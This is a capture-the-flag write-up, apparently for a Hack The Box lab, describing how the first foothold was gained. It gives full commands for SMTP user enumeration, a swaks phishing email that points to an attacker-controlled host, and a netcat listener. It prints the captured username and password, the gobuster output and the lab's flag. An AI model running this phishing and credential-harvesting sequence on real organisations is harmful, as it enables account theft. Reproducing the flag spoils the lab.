Scribd
Upload
21 views

Writeup

Uploaded by

hpu16328
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
21 views

Writeup

Uploaded by

hpu16328
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

Foothold:

Since in the portal there ia a email [email protected] and stated


that they are looking for new people in the legal, sales, store, and retail I try
to test email address with telnet and RCPT, and found sales and legal valid
addresses. As suggested by writeup then I found a smtp enumeration would have been
the right choice, strange wordlist though to pick up:
/usr/share/wordlists/seclists/Usernames/Honeypot-Captures/multiplesources-users-
fabian-fingerle.de.txt. Not really needed that. But to make it work, in the body of
email should be specified the word "citrix" and http://attacker_ip.
smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/Honeypot-
Captures/multiplesources-users-fabian-fingerle.de.txt -m 50 -f jointheteam -t
10.13.38.12 -D humongousretail.com -
###################################################################################
###################################################################################
###############################
Sent email as follow:
swaks --to [email protected] --from [email protected]
--header "Subject: portal" --body "citrix http://10.10.15.23" --server 10.13.38.12

and received answer (different ones if try more times) from nc -lvnp 80:

listening on [any] 80 ...


connect to [10.10.15.23] from (UNKNOWN) [10.13.38.12] 53929
POST /remote/auth/login.aspx?
LoginType=Explicit&user=awardel&password=@M3m3ntoM0ri@&domain=HTB.LOCAL HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/59.0.3071.115 Safari/537.36
Host: 10.10.15.23
Content-Length: 75
Expect: 100-continue
Connection: Keep-Alive

LoginType=Explicit&user=awardel&password=%40M3m3ntoM0ri%40&domain=HTB.LOCAL

###################################################################################
###################################################################################
###############################
run directory scan and found /remote with a login and password page.

gobuster dir -u http://humongousretail.com -w /usr/share/seclists/Discovery/Web-


Content/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://humongousretail.com
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-
list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 157] [-->
http://humongousretail.com/images/]
/Images (Status: 301) [Size: 157] [-->
http://humongousretail.com/Images/]
/css (Status: 301) [Size: 154] [-->
http://humongousretail.com/css/]
/js (Status: 301) [Size: 153] [-->
http://humongousretail.com/js/]
/remote (Status: 301) [Size: 157] [-->
http://humongousretail.com/remote/]

logged in with the credentials we have grabbed from phishing email and it works.
###################################################################################
###################################################################################
################################
On /remote there is a Citrix login page that offers to download the citrix receiver
client, it works on windows machine on linux still not working
After loggin in with credentials we have from phishing we download the ICA
configuration file and open it with Citrix receiver and under Desktop folder I
found the FLag.txt
######################
XEN{wh0_n33d5_2f@?} # BREACH
######################

###################################################################################
###################################################################################
################################

You might also like